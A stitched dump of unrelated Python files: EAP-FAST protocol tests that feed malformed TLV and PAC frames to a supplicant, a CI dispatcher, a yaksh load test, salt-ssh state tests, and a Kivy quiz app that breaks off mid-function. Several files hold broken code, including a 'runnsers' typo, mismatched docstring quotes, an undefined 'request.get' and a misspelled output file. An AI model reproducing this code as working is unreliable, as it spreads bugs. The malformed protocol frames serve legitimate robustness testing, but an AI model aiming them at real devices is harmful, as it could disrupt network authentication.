return struct.pack(">BBHBBHH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 16,
EAP_TYPE_FAST, 0x21, 4, 16) + 16*'A'
def test_eap_fast_proto(dev, apdev):
"""EAP-FAST Phase protocol testing"""
check_eap_capa(dev[0], "FAST")
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("EAP-FAST: TLS processing failed")
data = 'ABCDEFGHIK'
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
def run_eap_fast_phase2(dev, test_payload, test_failure=True):
global eap_fast_proto_ctx
eap_fast_proto_ctx = None
def ssl_info_callback(conn, where, ret):
logger.debug("SSL: info where=%d ret=%d" % (where, ret))
def process_clienthello(ctx, payload):
logger.info("Process ClientHello")
ctx['sslctx'] = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx['sslctx'].set_info_callback(ssl_info_callback)
ctx['sslctx'].load_tmp_dh("auth_serv/dh.conf")
ctx['sslctx'].set_cipher_list("ADH-AES128-SHA")
ctx['conn'] = OpenSSL.SSL.Connection(ctx['sslctx'], None)
ctx['conn'].set_accept_state()
logger.info("State: " + ctx['conn'].state_string())
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
logger.info("State: " + ctx['conn'].state_string())
data = ctx['conn'].bio_read(4096)
logger.info("State: " + ctx['conn'].state_string())
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def process_clientkeyexchange(ctx, payload, appl_data):
logger.info("Process ClientKeyExchange")
logger.info("State: " + ctx['conn'].state_string())
ctx['conn'].bio_write(payload)
try:
ctx['conn'].do_handshake()
except OpenSSL.SSL.WantReadError:
pass
ctx['conn'].send(appl_data)
logger.info("State: " + ctx['conn'].state_string())
data = ctx['conn'].bio_read(4096)
logger.info("State: " + ctx['conn'].state_string())
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + len(data),
EAP_TYPE_FAST, 0x01) + data
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_fast_proto_ctx
eap_fast_proto_ctx = ctx
ctx['test_done'] = False
logger.debug("ctx['num']=%d" % ctx['num'])
idx += 1
if ctx['num'] == idx:
return eap_fast_start(ctx)
idx += 1
if ctx['num'] == idx:
return process_clienthello(ctx, req[6:])
idx += 1
if ctx['num'] == idx:
if not test_failure:
ctx['test_done'] = True
return process_clientkeyexchange(ctx, req[6:], test_payload)
idx += 1
if ctx['num'] == idx:
ctx['test_done'] = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
logger.info("Past last test case")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(eap_handler)
try:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="FAST", anonymous_identity="FAST",
identity="user", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
phase1="fast_provisioning=1",
pac_file="blob://fast_pac_proto",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("Could not start EAP-FAST")
dev[0].dump_monitor()
ok = False
for i in range(100):
if eap_fast_proto_ctx:
if eap_fast_proto_ctx['test_done']:
ok = True
break
time.sleep(0.05)
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
if not ok:
raise Exception("EAP-FAST TLS exchange did not complete")
for i in range(3):
dev[i].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_fast_proto_phase2(dev, apdev):
"""EAP-FAST Phase 2 protocol testing"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0]['ifname'])
tests = [ ("Too short Phase 2 TLV frame (len=3)",
"ABC",
False),
("EAP-FAST: TLV overflow",
struct.pack(">HHB", 0, 2, 0xff),
False),
("EAP-FAST: Unknown TLV (optional and mandatory)",
struct.pack(">HHB", 0, 1, 0xff) +
struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY, 1, 0xff),
True),
("EAP-FAST: More than one EAP-Payload TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff,
EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Result 255 and More than one Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_RESULT_TLV, 2, 0xff,
EAP_TLV_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Result TLV",
struct.pack(">HHB", EAP_TLV_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: Unknown Intermediate Result 255 and More than one Intermediate-Result TLV in the message",
struct.pack(">HHHHHH",
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff,
EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff),
True),
("EAP-FAST: Too short Intermediate-Result TLV",
struct.pack(">HHB", EAP_TLV_INTERMEDIATE_RESULT_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Crypto-Binding TLV in the message",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A' +
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True),
("EAP-FAST: Too short Crypto-Binding TLV",
struct.pack(">HHB", EAP_TLV_CRYPTO_BINDING_TLV, 1, 0xff),
True),
("EAP-FAST: More than one Request-Action TLV in the message",
struct.pack(">HHBBHHBB",
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff,
EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff),
True),
("EAP-FAST: Too short Request-Action TLV",
struct.pack(">HHB", EAP_TLV_REQUEST_ACTION_TLV, 1, 0xff),
True),
("EAP-FAST: More than one PAC TLV in the message",
struct.pack(">HHBHHB",
EAP_TLV_PAC_TLV, 1, 0xff,
EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Too short EAP Payload TLV (Len=3)",
struct.pack(">HH3B",
EAP_TLV_EAP_PAYLOAD_TLV, 3, 0, 0, 0),
False),
("EAP-FAST: Too short Phase 2 request (Len=0)",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 0),
False),
("EAP-FAST: EAP packet overflow in EAP Payload TLV",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
EAP_CODE_REQUEST, 0, 4 + 1),
False),
("EAP-FAST: Unexpected code=0 in Phase 2 EAP header",
struct.pack(">HHBBH",
EAP_TLV_EAP_PAYLOAD_TLV, 4,
0, 0, 0),
False),
("EAP-FAST: PAC TLV without Result TLV acknowledging success",
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: PAC TLV does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
True),
("EAP-FAST: Invalid PAC-Key length 0, Ignored unknown PAC type 0, and PAC TLV overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHB", EAP_TLV_PAC_TLV, 4 + 4 + 5,
PAC_TYPE_PAC_KEY, 0, 0, 0, 0, 2, 0),
True),
("EAP-FAST: PAC-Info does not include all the required fields",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid CRED_LIFETIME length, Ignored unknown PAC-Info type 0, and Invalid PAC-Type length 1",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 13 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 13, PAC_TYPE_CRED_LIFETIME, 0,
0, 0, PAC_TYPE_PAC_TYPE, 1, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Unsupported PAC-Type 0",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 6 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 6, PAC_TYPE_PAC_TYPE, 2, 0,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: PAC-Info overrun (type=0 len=2 left=1)",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 5 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 5, 0, 2, 1,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Valid PAC",
struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
EAP_TLV_RESULT_SUCCESS) +
struct.pack(">HHHHHHHHBHHBHH", EAP_TLV_PAC_TLV,
4 + 4 + 10 + 4 + 32,
PAC_TYPE_PAC_OPAQUE, 0,
PAC_TYPE_PAC_INFO, 10, PAC_TYPE_A_ID, 1, 0x41,
PAC_TYPE_A_ID_INFO, 1, 0x42,
PAC_TYPE_PAC_KEY, 32) + 32*'A',
True),
("EAP-FAST: Invalid version/subtype in Crypto-Binding TLV",
struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
True) ]
for title, payload, failure in tests:
logger.info("Phase 2 test: " + title)
run_eap_fast_phase2(dev, payload, failure)
def test_eap_fast_tlv_nak_oom(dev, apdev):
"""EAP-FAST Phase 2 TLV NAK OOM"""
if not openssl_imported:
raise HwsimSkip("OpenSSL python method not available")
check_eap_capa(dev[0], "FAST")
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_fast_tlv_nak"):
run_eap_fast_phase2(dev, struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY,
1, 0xff), False)
|
dispatcher.py | import argparse
import os
import re
import socket
import socketserver
import threading
import time
import helpers
def dispatch_tests(server, commit_id):
while True:
print("trying to dispatch to runners")
for runner in server.runners:
response = helpers.communicate(runner['host'], int(runner['port']), "runtest:{}".format(commit_id))
if response == "OK":
print("adding id {}".format(commit_id))
server.dispatched_commits[commit_id] = runner
if commit_id in server.pending_commits:
server.pending_commits.remove(commit_id)
return
time.sleep(2)
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
runners = []
dead = False
dispatched_commits = []
pending_commits = []
class DispatcherHandler(socketserver.BaseRequestHandler):
command_re = re.compile(r"(\w+)(:.+)")
BUF_SIZE = 1024
def handler(self):
self.data = self.request.recv(self.BUF_SIZE).strip()
command_groups = self.command_re.match(self.data)
if not command_groups:
self.request.sendall("Invalid command")
return
command = command_groups.group(1)
if command == "status":
print("in status")
self.request.sendall("OK")
elif command == "register":
print("register")
address = command_groups.group(2)
host, port = re.findall(r":(\w*)", address)
runner = {"host": host, "port": port}
self.server.runners.append(runner)
self.request.sendall("OK")
elif command == "dispatch":
print("going to dispatch")
commit_id = command_groups.group(2)[1:]
if not self.server.runners:
self.request.sendall("No runners are registered")
else:
self.request.sendall("OK")
dispatch_tests(self.server, commit_id)
elif command == "results":
print("go test results")
results = command_groups.group(2)[1:]
results = results.split(":")
commit_id = results[0]
msg_length = int(results[1])
remaining_buffer = self.BUF_SIZE - (len(command) + len(commit_id) + len(results[1]) + 3)
if msg_length > remaining_buffer:
self.data += self.request.recv(msg_length - remaining_buffer).strip()
del self.server.dispatched_commits[commit_id]
if not os.path.exists("test_results"):
os.mkdir("test_results")
with open("test_results/{}".format(commit_id), "w") as f:
data = self.data.split(":")[3:]
data = "\n".join(data)
f.write(data)
self.request.sendall("OK")
else:
self.request.sendall("Invalid command")
def serve():
parser = argparse.ArgumentParser()
parser.add_argument("--host", help="dispatcher's host, by default it uses localhost", default="localhost",
action="store")
parser.add_argument("--port", help="dispatcher's port, by default is uses 8888", default=8888, action="store")
args = parser.parse_args()
server = ThreadingTCPServer((args.host, int(args.port)), DispatcherHandler)
print("server on {}:{}".format(args.host, args.port))
def runner_checker(server):
def manage_commit_lists(runner):
for commit, assigned_runner in server.dispatched_commits.iteritems():
if assigned_runner == runner:
del server.dispatched_commits[commit]
server.pending_commits.append(commit)
break
server.runners.remove(runner)
while not server.dead:
time.sleep(1)
for runner in server.runnsers:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
response = helpers.communicate(runner["host"], int(runner['port']), "ping")
if response != "pong":
print("removing runner {}".format(runner))
manage_commit_lists(runner)
except socket.error:
manage_commit_lists(runner)
def redistribute(server):
while not server.dead:
for commit in server.pending_commits:
print("running redistribute")
print(server.pending_commits)
dispatch_tests(server, commit)
time.sleep(5)
runner_heartbeat = threading.Thread(target=runner_checker, args=(server,))
redistributor = threading.Thread(target=redistribute, args=(server,))
try:
runner_heartbeat.start()
server.serve_forever()
except (KeyboardInterrupt, Exception):
server.dead = True
runner_heartbeat.join()
redistributor.join()
if __name__ == '__main__':
serve()
|
load_test.py | from threading import Thread
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
# Local imports
from yaksh.models import User, Profile, Course
from yaksh.code_server import ServerPool
from yaksh import settings
from .selenium_test import SeleniumTest
class YakshSeleniumTests(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
super(YakshSeleniumTests, cls).setUpClass()
# setup a demo code server
settings.code_evaluators['python']['standardtestcase'] = \
"yaksh.python_assertion_evaluator.PythonAssertionEvaluator"
settings.code_evaluators['c']['standardtestcase'] = \
"yaksh.cpp_code_evaluator.CppCodeEvaluator"
settings.code_evaluators['bash']['standardtestcase'] = \
"yaksh.bash_code_evaluator.BashCodeEvaluator"
code_server_pool = ServerPool(
n=settings.N_CODE_SERVERS, pool_port=settings.SERVER_POOL_PORT
)
cls.code_server_pool = code_server_pool
cls.code_server_thread = t = Thread(target=code_server_pool.run)
t.start()
cls.demo_student = User.objects.create_user(
username='demo_student',
password='demo_student',
email='demo_student@test.com'
)
cls.demo_student_profile = Profile.objects.create(
user=cls.demo_student,
roll_number=3, institute='IIT',
department='Chemical', position='Student'
)
cls.demo_mod = User.objects.create_user(
username='demo_mod',
password='demo_mod',
email='demo_mod@test.com'
)
cls.demo_mod_profile = Profile.objects.create(
user=cls.demo_mod,
roll_number=0, institute='IIT',
department='Chemical', position='Moderator'
)
course_obj = Course()
course_obj.create_demo(cls.demo_mod)
cls.demo_course = Course.objects.get(id=1)
cls.demo_course.students.add(cls.demo_student)
@classmethod
def tearDownClass(cls):
cls.demo_student.delete()
cls.demo_student_profile.delete()
cls.demo_mod.delete()
cls.demo_mod_profile.delete()
cls.demo_course.delete()
cls.code_server_pool.stop()
cls.code_server_thread.join()
super(YakshSeleniumTests, cls).tearDownClass()
def test_load(self):
url = '%s%s' % (self.live_server_url, '/exam/login/')
quiz_name = "Yaksh Demo quiz"
module_name = "Demo Module"
course_name = "Yaksh Demo course"
selenium_test = SeleniumTest(url=url, quiz_name=quiz_name,
module_name=module_name,
course_name=course_name)
selenium_test.run_load_test(
url=url, username='demo_student', password='demo_student'
)
|
test_state.py | # -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import glob
import logging
import os
import shutil
import threading
import time
import logging
# Import Salt Testing Libs
from tests.support.runtests import RUNTIME_VARS
from tests.support.case import SSHCase
from tests.support.helpers import flaky
# Import Salt Libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=redefined-builtin
from tests.support.case import SSHCase
from tests.support.helpers import flaky
# Import Salt Testing Libs
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
SSH_SLS = "ssh_state_tests"
SSH_SLS_FILE = "/tmp/salt_test_file"
log = logging.getLogger(__name__)
class SSHStateTest(SSHCase):
"""
testing the state system with salt-ssh
"""
def _check_dict_ret(self, ret, val, exp_ret, equal=True):
self.assertIsInstance(ret, dict)
for key, value in ret.items():
self.assertIsInstance(value, dict)
if equal:
self.assertEqual(value[val], exp_ret)
else:
self.assertNotEqual(value[val], exp_ret)
def _check_request(self, empty=False):
check = self.run_function("state.check_request", wipe=False)
if empty:
self.assertFalse(bool(check), "bool({0}) is not False".format(check))
else:
self._check_dict_ret(
ret=check["default"]["test_run"]["local"]["return"],
val="__sls__",
exp_ret=SSH_SLS,
)
@skipIf(True, "SLOWTEST skip")
def test_state_apply(self):
"""
test state.apply with salt-ssh
"""
ret = self.run_function("state.apply", [SSH_SLS])
self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
check_file = self.run_function("file.file_exists", [SSH_SLS_FILE])
self.assertTrue(check_file)
@skipIf(True, "SLOWTEST skip")
def test_state_sls_id(self):
"""
test state.sls_id with salt-ssh
"""
# check state.sls_id with test=True
ret = self.run_function("state.sls_id", ["ssh-file-test", SSH_SLS, "test=True"])
self._check_dict_ret(
ret=ret,
val="comment",
exp_ret=(
"The file {} is set to be changed\n"
"Note: No changes made, actual changes may\n"
"be different due to other states."
).format(SSH_SLS_FILE),
)
# check state.sls_id without test=True
ret = self.run_function("state.sls_id", ["ssh-file-test", SSH_SLS])
self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
# make sure the other id in the state was not run
self._check_dict_ret(ret=ret, val="__id__", exp_ret="second_id", equal=False)
check_file = self.run_function("file.file_exists", [SSH_SLS_FILE])
self.assertTrue(check_file)
@skipIf(True, "SLOWTEST skip")
def test_state_sls_wrong_id(self):
"""
test state.sls_id when id does not exist
"""
# check state.sls_id with test=True
ret = self.run_function("state.sls_id", ["doesnotexist", SSH_SLS])
assert "No matches for ID" in ret
@skipIf(True, "SLOWTEST skip")
def test_state_sls_id_with_pillar(self):
"""
test state.sls_id with pillar data
"""
self.run_function(
"state.sls_id",
["ssh-file-test", SSH_SLS, 'pillar=\'{"test_file_suffix": "_pillar"}\''],
)
check_file = self.run_function(
"file.file_exists", ["/tmp/salt_test_file_pillar"]
)
self.assertTrue(check_file)
@skipIf(True, "SLOWTEST skip")
def test_state_show_sls(self):
"""
test state.show_sls with salt-ssh
"""
ret = self.run_function("state.show_sls", [SSH_SLS])
self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
check_file = self.run_function("file.file_exists", [SSH_SLS_FILE], wipe=False)
self.assertFalse(check_file)
@skipIf(True, "SLOWTEST skip")
def test_state_show_top(self):
"""
test state.show_top with salt-ssh
"""
ret = self.run_function("state.show_top")
self.assertEqual(ret, {"base": ["core", "master_tops_test"]})
@skipIf(True, "SLOWTEST skip")
def test_state_single(self):
"""
state.single with salt-ssh
"""
ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
single = self.run_function(
"state.single", ["test.succeed_with_changes name=itworked"]
)
self.assertIsInstance(single, dict)
for key, value in six.iteritems(single):
self.assertIsInstance(value, dict)
self.assertEqual(value["name"], ret_out["name"])
self.assertEqual(value["result"], ret_out["result"])
self.assertEqual(value["comment"], ret_out["comment"])
@skipIf(True, "SLOWTEST skip")
def test_show_highstate(self):
"""
state.show_highstate with salt-ssh
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(RUNTIME_VARS.TMP, 'testfile')
self.assertIsInstance(high, dict)
self.assertIn(destpath, high)
self.assertEqual(high[destpath]["__env__"], "base")
@skipIf(True, "SLOWTEST skip")
def test_state_high(self):
"""
state.high with salt-ssh
"""
ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
high = self.run_function(
"state.high", ['"{"itworked": {"test": ["succeed_with_changes"]}}"']
)
self.assertIsInstance(high, dict)
for key, value in six.iteritems(high):
self.assertIsInstance(value, dict)
self.assertEqual(value["name"], ret_out["name"])
self.assertEqual(value["result"], ret_out["result"])
self.assertEqual(value["comment"], ret_out["comment"])
@skipIf(True, "SLOWTEST skip")
def test_show_lowstate(self):
"""
state.show_lowstate with salt-ssh
"""
low = self.run_function("state.show_lowstate")
self.assertIsInstance(low, list)
self.assertIsInstance(low[0], dict)
@skipIf(True, "SLOWTEST skip")
def test_state_low(self):
"""
state.low with salt-ssh
"""
ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
low = self.run_function(
"state.low",
['"{"state": "test", "fun": "succeed_with_changes", "name": "itworked"}"'],
)
self.assertIsInstance(low, dict)
for key, value in six.iteritems(low):
self.assertIsInstance(value, dict)
self.assertEqual(value["name"], ret_out["name"])
self.assertEqual(value["result"], ret_out["result"])
self.assertEqual(value["comment"], ret_out["comment"])
@skipIf(True, "SLOWTEST skip")
def test_state_request_check_clear(self):
"""
test state.request system with salt-ssh
while also checking and clearing request
"""
request = self.run_function("state.request", [SSH_SLS], wipe=False)
self._check_dict_ret(ret=request, val="__sls__", exp_ret=SSH_SLS)
self._check_request()
clear = self.run_function("state.clear_request", wipe=False)
self._check_request(empty=True)
@skipIf(True, "SLOWTEST skip")
def test_state_run_request(self):
"""
test state.request system with salt-ssh
while also running the request later
"""
request = self.run_function("state.request", [SSH_SLS], wipe=False)
self._check_dict_ret(ret=request, val="__sls__", exp_ret=SSH_SLS)
run = self.run_function("state.run_request", wipe=False)
check_file = self.run_function("file.file_exists", [SSH_SLS_FILE], wipe=False)
self.assertTrue(check_file)
@flaky
@skipIf(True, "SLOWTEST skip")
def test_state_running(self):
"""
test state.running with salt-ssh
"""
def _run_in_background():
self.run_function("state.sls", ["running"], wipe=False)
bg_thread = threading.Thread(target=_run_in_background)
bg_thread.start()
expected = 'The function "state.pkg" is running as'
state_ret = []
for _ in range(30):
time.sleep(5)
get_sls = self.run_function("state.running", wipe=False)
state_ret.append(get_sls)
if expected in " ".join(get_sls):
# We found the expected return
break
else:
self.fail(
"Did not find '{0}' in state.running return: {1}".format(
expected, state_ret
)
)
# make sure we wait until the earlier state is complete
future = time.time() + 120
while True:
if expected not in " ".join(self.run_function("state.running", wipe=False)):
break
if time.time() > future:
self.fail(
"state.pkg is still running overtime. Test did not clean up correctly."
)
def tearDown(self):
"""
make sure to clean up any old ssh directories
"""
salt_dir = self.run_function("config.get", ["thin_dir"], wipe=False)
self.assertIsInstance(salt_dir, six.string_types)
if os.path.exists(salt_dir):
shutil.rmtree(salt_dir)
for test_file_path in glob.glob(SSH_SLS_FILE + "*"):
os.remove(test_file_path)
|
login1.py | from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivymd.uix.label import MDLabel
from kivy.properties import StringProperty
from kivy.properties import NumericProperty
from kivy.clock import Clock
from kivymd.uix.behaviors import RectangularRippleBehavior, BackgroundColorBehavior
from kivy.core.window import Window
from kivy.uix.widget import Widget
from kivy.properties import StringProperty,ObjectProperty
from kivy.animation import Animation
from kivy.utils import get_color_from_hex
from kivy.core.text import LabelBase
from kivy.event import EventDispatcher
from kivymd.uix.button import MDRectangleFlatButton,MDRoundFlatButton,MDRectangleFlatButton,MDRaisedButton
import json
import requests
import time
from kivy.network.urlrequest import UrlRequest
import random
from urllib.request import urlopen
from kivy.uix.popup import Popup
from kivy.graphics import Color
import urllib.parse
import urllib.request
import inspect, os
import _thread
import threading
from kivy.core.window import Window
from database import DataBase
Window.clearcolor = (.666, 1, .372, 1)
# Register fonts
LabelBase.register(
name="Roboto",
fn_regular="Quando.ttf",
fn_bold="Quando.ttf"
)
class Question():
def __init__(self, question, answer, option2, option3, option4, correct):
self.question = question
self.answer = answer
self.option2 = option2
self.option3 = option3
self.option4 = option4
self.correct = correct
class ListQuestions():
def __init__(self,directory="/questions"):
self.directory = directory
self.questions_python = []
self.read_questions()
def get_question_python(self):
return self.questions_python[random.randint(0, len(self.questions_python) - 1 )]
def read_questions(self):
with open(os.getcwd()+'/questions/firebase.json') as json_file:
json_data = json.load(json_file)
for q in json_data:
if(q["category"] =="python"):
self.questions_python.append(Question(q["quest"], q["answer"], q["option2"], q["option3"], q["option4"], q["correct"]))
else:
print("else")
def update(self):
url = "https://samplefirebaseapp-3de75.firebaseio.com/export.json"
response = request.get(url)
data = json.load(response)
with open(os.getcwd()+'/questions/firbase.json', 'w') as outfile:# w is write mode or r is read mode
json.dump(data, outfile)
print(os.getcwd())
class NextScreen(Screen):
pass
class TaskCreator():
def __init__(self):
self.questions = ListQuestions()
def get_task(self, mode=1):
question_1 = ""
answers_1 = ""
option_1 = ""
option_2 = ""
option_3 = ""
option_4 = ""
correct_1 = ""
if mode == 2:
question_python = self.questions.get_question_python()
question_1 = question_python.question
answers_1 = question_python.answer
option_1 = question_python.answer
option_2 = question_python.option2
option_3 = question_python.option3
option_4 = question_python.option4
correct_1 = question_python.correct
operands = [question_1, answers_1]
answers = [option_1, option_2, option_3, option_4]
random.shuffle(answers)
whole_task = operands + answers + [correct_1]
return whole_task
class AboutScreen(Screen):
def about_text(self):
return "Hi =)\n" \
"This is a simple project.\n"
class CreateAccount(Screen):
namee = ObjectProperty(None)
email = ObjectProperty(None)
password = ObjectProperty(None)
def submit(self):
if self.namee.text != "" and self.email.text != "" and self.email.text.count("@") == 1 and self.email.text.count(".") > 0:
if self.password != "":
db.add_user(self.email.text, self.password.text, self.namee.text)
self.reset()
self.manager.current = "menu"
else:
invalidForm()
else:
invalidForm()
def login(self):
self.reset()
self.manager.current = "login"
def reset(self):
self.email.text = ""
self.password.text = ""
self.namee.text = ""
class StartScreen(Screen):
pass
class SigninWindow(Screen):
email = ObjectProperty(None)
password = ObjectProperty(None)
def loginBtn(self):
if db.validate(self.email.text, self.password.text):
MainWindow.current = self.email.text
self.reset()
self.manager.current = "menu"
else:
invalidLogin()
def createBtn(self):
self.reset()
self.manager.current = "create"
def reset(self):
self.email.text = ""
self.password.text = ""
class HelpScreen(Screen):
def help_text(self):
return "Hi \n" \
"This game will provide you some questions about General Knowledge.\n" \
class Menu(Screen):
def update_game(self):
pop = Popup(title='Updating', content=Label(text='Questions been updated'), auto_dismiss=False)
pop.open()
Clock.schedule_once(self.update, 0)
pop.dismiss()
def update(self,event):
l = ListQuestions()
l.update()
class ActionScreen(Screen):
errors_made = 0
round_number = 1
max_rounds = 2
count = 0
task_values = [0, 0, 0, 0, 0, 0, 0] # list for quest,amswer,opt1,opt2,opt3,opt4
current_mode = 1
def new_game(self):
self.Tasks = TaskCreator()
self.round_number = 0
self.count = 0
self.errors_made = 0
self.set_next_task()
#when it shows first question round becomes 1
def set_next_task(self):
self.task_values = self.Tasks.get_task(self.current_mode)
self.ids.task.text = self.task_values[0]
self.ids.button_1.text = str(self.task_values[2])
self.ids.button_2.text = str(self.task_values[3])
self.ids.button_3.text = str(self.task_values[4])
self.ids.button_4.text = str(self.task_values[5])
Clock.schedule_once(self.update_label, 1)
self.ids.label_1.text = "Errors: " + str(self.errors_made)
#self.ids.label_2.text = str(self.current_mode) + str(self.current_mode)
self.ids.label_2.text = "Score: " + str(self.count)
self.ids.label_3.text = str(self.round_number) + " / " + str(self.max_rounds)
self.ids.button_1.background_normal = "./data/normal.png"
self.ids.button_2.background_normal = "./data/normal.png"
self.ids.button_3.background_normal = "./data/normal.png"
self.ids.button_4.background_normal = "./data/normal.png"
def update_label(self, *args):
cut_off = 20
self.ids.label_4.text = str(int(self.ids.label_4.text) + 1)
if int(self.ids.label_4.text) < cut_off:
